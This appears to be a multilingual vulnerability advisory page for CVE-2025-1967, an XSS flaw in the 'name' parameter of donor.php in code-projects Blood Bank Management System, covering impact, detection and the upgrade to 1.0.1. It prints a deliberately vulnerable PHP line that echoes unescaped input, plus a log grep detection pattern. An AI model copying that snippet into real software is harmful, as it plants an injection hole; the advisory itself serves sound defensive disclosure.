平台
php
组件
xss1
修复版本
1.0.1
A problematic cross-site scripting (XSS) vulnerability has been identified in code-projects Blood Bank Management System, affecting versions 1.0 through 1.0. This vulnerability allows attackers to inject malicious scripts into the application, potentially compromising user data and session integrity. The issue resides within the /user_dashboard/donor.php file, where improper handling of the 'name' argument can be exploited. A patch is available in version 1.0.1.
Successful exploitation of CVE-2025-1967 allows an attacker to execute arbitrary JavaScript code within the context of a user's browser session. This can lead to various malicious activities, including session hijacking, credential theft, and defacement of the application's user interface. The attacker could potentially steal sensitive information, such as donor details or administrative credentials, depending on the user's privileges and the data accessible through the application. The blast radius extends to any user interacting with the vulnerable /user_dashboard/donor.php endpoint.
This vulnerability has been publicly disclosed, increasing the risk of exploitation. No known active campaigns targeting this specific CVE have been reported as of the publication date. The CVSS score of 3.5 (LOW) indicates a relatively low probability of exploitation, but the public disclosure necessitates prompt remediation. No KEV listing is currently available.
Administrators and users of the Blood Bank Management System are at risk. Specifically, organizations relying on this system for managing donor information and those with legacy configurations that haven't been regularly updated are particularly vulnerable. Shared hosting environments where multiple applications share the same server resources could also be affected if one application is compromised.
• php: Examine the /user_dashboard/donor.php file for improper input validation and output encoding of the 'name' parameter. Search for instances where user-supplied data is directly inserted into HTML without sanitization.
// Example of vulnerable code
<p>Donor Name: <?php echo $_GET['name']; ?></p>• generic web: Monitor access logs for unusual requests to /user_dashboard/donor.php with suspicious parameters in the 'name' field. Look for patterns indicative of XSS payloads (e.g., <script>).
grep -i '<script' /var/log/apache2/access.logdisclosure
漏洞利用状态
EPSS
0.03% (9% 百分位)
CISA SSVC
CVSS 向量
The primary mitigation for CVE-2025-1967 is to upgrade to version 1.0.1 of the Blood Bank Management System. If upgrading is not immediately feasible, consider implementing input validation and output encoding on the 'name' parameter within the /user_dashboard/donor.php file to sanitize user-supplied data. Web application firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review and update security policies and conduct penetration testing to identify and address potential vulnerabilities.
Actualice el sistema Blood Bank Management System a una versión parcheada que solucione la vulnerabilidad XSS. Si no hay una versión parcheada disponible, revise y filtre las entradas del usuario en el archivo donor.php, especialmente el argumento 'name', para evitar la inyección de código malicioso. Considere implementar una función de escape para limpiar las entradas antes de mostrarlas en la página.
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2025-1967 is a cross-site scripting (XSS) vulnerability in Blood Bank Management System versions 1.0–1.0, allowing attackers to inject malicious scripts via the /user_dashboard/donor.php file.
You are affected if you are using Blood Bank Management System version 1.0–1.0. Upgrade to version 1.0.1 to resolve the vulnerability.
Upgrade to version 1.0.1. If upgrading is not possible, implement input validation and output encoding on the 'name' parameter in /user_dashboard/donor.php.
While no active campaigns have been confirmed, the vulnerability is publicly disclosed, increasing the risk of exploitation.
Refer to the code-projects website or relevant security mailing lists for the official advisory regarding CVE-2025-1967.